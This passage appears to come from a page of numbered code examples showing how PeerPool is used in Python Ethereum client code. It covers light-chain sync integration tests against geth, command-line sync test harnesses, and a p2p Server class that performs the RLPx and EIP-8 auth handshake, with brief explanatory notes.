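A note on the EIP-8 fallback in _receive_handshake above: the first read fetches ENCRYPTED_AUTH_MSG_LEN bytes, the fixed size of a pre-EIP-8 auth message. When decryption fails, the message is treated as EIP-8, whose leading two bytes carry a big-endian length that excludes the prefix itself, which is why the remainder works out as:

#   total bytes on the wire = 2 + msg_size
#   already read            = ENCRYPTED_AUTH_MSG_LEN
#   remaining_bytes         = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2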
Example #19
async def test_lightchain_integration(request, event_loop, caplog):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --capture=no --enode=...

    If you don't have any geth testnet data ready, it is very quick to generate some with:

        geth --testnet --syncmode full

    You only need the first 11 blocks for this test to succeed. Then you can restart geth with:

        geth --testnet --lightserv 90 --nodiscover
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    # will almost certainly want verbose logging in a failure
    caplog.set_level(logging.DEBUG)

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(
        LESPeer,
        FakeAsyncHeaderDB(base_db),
        ROPSTEN_NETWORK_ID,
        ecies.generate_privkey(),
        ROPSTEN_VM_CONFIGURATION,
    )
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.highest_td_peer.head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to look up the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('0x8B09D9ac6A4F7778fCb22852e879C7F3B2bEeF81')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       contract_addr)
    assert encode_hex(contract_code) == '0x600060006000600060006000356000f1'

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example #20
def _test():
    import argparse
    import signal
    from evm.chains.mainnet import (MAINNET_GENESIS_HEADER,
                                    MAINNET_VM_CONFIGURATION,
                                    MAINNET_NETWORK_ID)
    from evm.chains.ropsten import ROPSTEN_GENESIS_HEADER, ROPSTEN_NETWORK_ID
    from evm.db.backends.level import LevelDB
    from evm.exceptions import CanonicalHeadNotFound
    from p2p import ecies
    from p2p.integration_test_helpers import LocalGethPeerPool

    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger("p2p.lightchain.LightChain").setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-mainnet', action="store_true")
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    GENESIS_HEADER = ROPSTEN_GENESIS_HEADER
    NETWORK_ID = ROPSTEN_NETWORK_ID
    if args.mainnet:
        GENESIS_HEADER = MAINNET_GENESIS_HEADER
        NETWORK_ID = MAINNET_NETWORK_ID
    DemoLightChain = LightChain.configure(
        'DemoLightChain',
        vm_configuration=MAINNET_VM_CONFIGURATION,
        network_id=NETWORK_ID,
    )

    chaindb = ChainDB(LevelDB(args.db))
    if args.local_geth:
        peer_pool = LocalGethPeerPool(LESPeer, chaindb, NETWORK_ID,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(LESPeer, chaindb, NETWORK_ID,
                             ecies.generate_privkey())
    try:
        chaindb.get_canonical_head()
    except CanonicalHeadNotFound:
        # We're starting with a fresh DB.
        chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER,
                                                   peer_pool)
    else:
        # We're reusing an existing db.
        chain = DemoLightChain(chaindb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    loop = asyncio.get_event_loop()

    async def run():
        # chain.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and chain.
        await chain.run()
        await peer_pool.stop()
        await chain.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, chain.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Example #21
async def test_lightchain_integration(request, event_loop):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --enode=...
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(LESPeer,
                         FakeAsyncHeaderDB(base_db), ROPSTEN_NETWORK_ID,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.peers[0].head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to look up the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Example #22
def main():
    args = parser.parse_args()

    if args.ropsten:
        chain_identifier = ROPSTEN
    else:
        # TODO: mainnet
        chain_identifier = ROPSTEN

    if args.light:
        sync_mode = SYNC_LIGHT
    else:
        # TODO: actually use args.sync_mode (--sync-mode)
        sync_mode = SYNC_LIGHT

    chain_config = ChainConfig.from_parser_args(
        chain_identifier,
        args,
    )

    # if console command, run the trinity CLI
    if args.subcommand == 'console':
        use_ipython = not args.vanilla_shell
        debug = args.log_level.upper() == 'DEBUG'

        # TODO: this should use the base `Chain` class rather than the protocol
        # class since it's just a repl with access to the chain.
        chain_class = get_chain_protocol_class(chain_config, sync_mode)
        chaindb = ChainDB(LevelDB(chain_config.database_dir))
        peer_pool = PeerPool(LESPeer, chaindb, chain_config.network_id,
                             chain_config.nodekey)

        chain = chain_class(chaindb, peer_pool)
        args.func(chain, use_ipython=use_ipython, debug=debug)
        sys.exit(0)

    logger, log_queue, listener = setup_trinity_logging(args.log_level.upper())

    # start the listener thread to handle logs produced by other processes in
    # the local logger.
    listener.start()

    # First initialize the database process.
    database_server_process = ctx.Process(target=run_database_process,
                                          args=(
                                              chain_config,
                                              LevelDB,
                                          ),
                                          kwargs={'log_queue': log_queue})

    # For now we just run the light sync against ropsten by default.
    networking_process = ctx.Process(target=run_networking_process,
                                     args=(chain_config, sync_mode),
                                     kwargs={'log_queue': log_queue})

    # start the processes
    database_server_process.start()
    wait_for_ipc(chain_config.database_ipc_path)

    networking_process.start()

    try:
        networking_process.join()
    except KeyboardInterrupt:
        logger.info('Keyboard Interrupt: Stopping')
        kill_process_gracefully(networking_process)
        logger.info('KILLED networking_process')
        kill_process_gracefully(database_server_process)
        logger.info('KILLED database_server_process')
Example #23
class Server:
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(self, privkey: datatypes.PrivateKey, server_address: Address,
                 chaindb: AsyncChainDB, bootstrap_nodes: List[str],
                 network_id: int) -> None:
        self.cancel_token = CancelToken('Server')
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        # TODO: bootstrap_nodes should be looked up by network_id.
        discovery = DiscoveryProtocol(self.privkey,
                                      self.server_address,
                                      bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(ETHPeer, self.chaindb, self.network_id,
                                  self.privkey, discovery)

    async def start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def run(self) -> None:
        await self.start()
        self.logger.info("Running server...")
        await self.cancel_token.wait()
        await self.stop()

    async def stop(self) -> None:
        self.logger.info("Closing server...")
        self.cancel_token.trigger()
        self._server.close()
        await self._server.wait_closed()
        await self.peer_pool.stop()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        # Read the fixed-size auth_init msg from the reader
        msg = await reader.read(ENCRYPTED_AUTH_MSG_LEN)

        # Use HandshakeResponder.decode_authentication(auth_init_message) on auth init msg
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        # Try to decode as EIP8
        except DecryptionError:
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await reader.read(remaining_bytes)
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)

        # Get remote's address: IPv4 or IPv6
        ip, port, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, port)

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        eth_peer = ETHPeer(remote=initiator_remote,
                           privkey=self.privkey,
                           reader=reader,
                           writer=writer,
                           aes_secret=aes_secret,
                           mac_secret=mac_secret,
                           egress_mac=egress_mac,
                           ingress_mac=ingress_mac,
                           chaindb=self.chaindb,
                           network_id=self.network_id)
        self.peer_pool.add_peer(eth_peer)
Example #24
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
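
Example #24's flags pick the sync strategy: -fast selects FastChainSyncer, -light switches both the peer class (LESPeer) and the syncer, and the default is RegularChainSyncer. Typical invocations (module name and paths are placeholders):

#   python <module> -db /tmp/ropsten-chaindata -fast
#   python <module> -db /tmp/ropsten-chaindata -light -enode enode://<pubkey>@<ip>:<port>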
Example #25
class Server:
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(
        self,
        privkey: datatypes.PrivateKey,
        server_address: Address,
        chaindb: AsyncChainDB,
        bootstrap_nodes: List[str],
        network_id: int,
        min_peers: int = DEFAULT_MIN_PEERS,
        peer_class: Type[BasePeer] = ETHPeer,
    ) -> None:
        self.cancel_token = CancelToken('Server')
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        self.peer_class = peer_class
        # TODO: bootstrap_nodes should be looked up by network_id.
        discovery = DiscoveryProtocol(self.privkey,
                                      self.server_address,
                                      bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(
            peer_class,
            self.chaindb,
            self.network_id,
            self.privkey,
            discovery,
            min_peers=min_peers,
        )

    async def start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def run(self) -> None:
        await self.start()
        self.logger.info("Running server...")
        self.logger.info(
            "enode://%s@%s:%s",
            self.privkey.public_key.to_hex()[2:],
            self.server_address.ip,
            self.server_address.tcp_port,
        )
        await self.cancel_token.wait()
        await self.stop()

    async def stop(self) -> None:
        self.logger.info("Closing server...")
        self.cancel_token.trigger()
        self._server.close()
        await self._server.wait_closed()
        await self.peer_pool.stop()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        await wait_with_token(
            self._receive_handshake(reader, writer),
            token=self.cancel_token,
            timeout=HANDSHAKE_TIMEOUT,
        )

    async def _receive_handshake(self, reader: asyncio.StreamReader,
                                 writer: asyncio.StreamWriter) -> None:
        self.logger.debug("Receiving handshake...")
        # Read the fixed-size auth_init msg from the reader
        msg = await wait_with_token(
            reader.read(ENCRYPTED_AUTH_MSG_LEN),
            token=self.cancel_token,
        )

        # Use decode_authentication(auth_init_message) on auth init msg
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        # Try to decode as EIP8
        except DecryptionError:
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await wait_with_token(
                reader.read(remaining_bytes),
                token=self.cancel_token,
            )
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)

        # Get remote's address: IPv4 or IPv6
        ip, socket, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, socket)

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        peer = self.peer_class(remote=initiator_remote,
                               privkey=self.privkey,
                               reader=reader,
                               writer=writer,
                               aes_secret=aes_secret,
                               mac_secret=mac_secret,
                               egress_mac=egress_mac,
                               ingress_mac=ingress_mac,
                               chaindb=self.chaindb,
                               network_id=self.network_id)

        await self.do_p2p_handshake(peer)

    async def do_p2p_handshake(self, peer: BasePeer) -> None:
        try:
            # P2P Handshake.
            await peer.do_p2p_handshake()
        except (HandshakeFailure, asyncio.TimeoutError) as e:
            self.logger.debug('Unable to finish P2P handshake: %s', str(e))
        else:
            # Run peer and add peer.
            self.peer_pool.start_peer(peer)
Example #26
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.chains.mainnet import MainnetChain, MAINNET_GENESIS_HEADER, MAINNET_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncMainnetChain,
                                                    FakeAsyncRopstenChain,
                                                    FakeAsyncHeaderDB,
                                                    connect_to_peers_loop)
    from trinity.protocol.eth.peer import ETHPeer  # noqa: F811
    from trinity.protocol.les.peer import LESPeer  # noqa: F811
    from trinity.utils.chains import load_nodekey

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(base_db)
    chaindb = FakeAsyncChainDB(base_db)
    try:
        genesis = chaindb.get_canonical_block_header_by_number(0)
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_class: Type[Union[ETHPeer, LESPeer]] = ETHPeer
    if args.light:
        peer_class = LESPeer

    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s" % genesis)
    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, vm_config)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = chain_class(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
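
Taken together, these examples follow one lifecycle for PeerPool: construct the pool, schedule peer_pool.run() on the event loop, feed it nodes (directly, via connect_to_peers_loop(), or via a DiscoveryProtocol), run the consuming service, and cancel or stop the pool on shutdown before closing the loop. Condensed into a sketch (names are drawn from the examples above; the exact PeerPool constructor arguments vary between the library versions shown):

async def main(peer_pool, syncer, nodes) -> None:
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    try:
        await syncer.run()
    finally:
        await peer_pool.cancel()   # older versions spell this peer_pool.stop()
        await syncer.cancel()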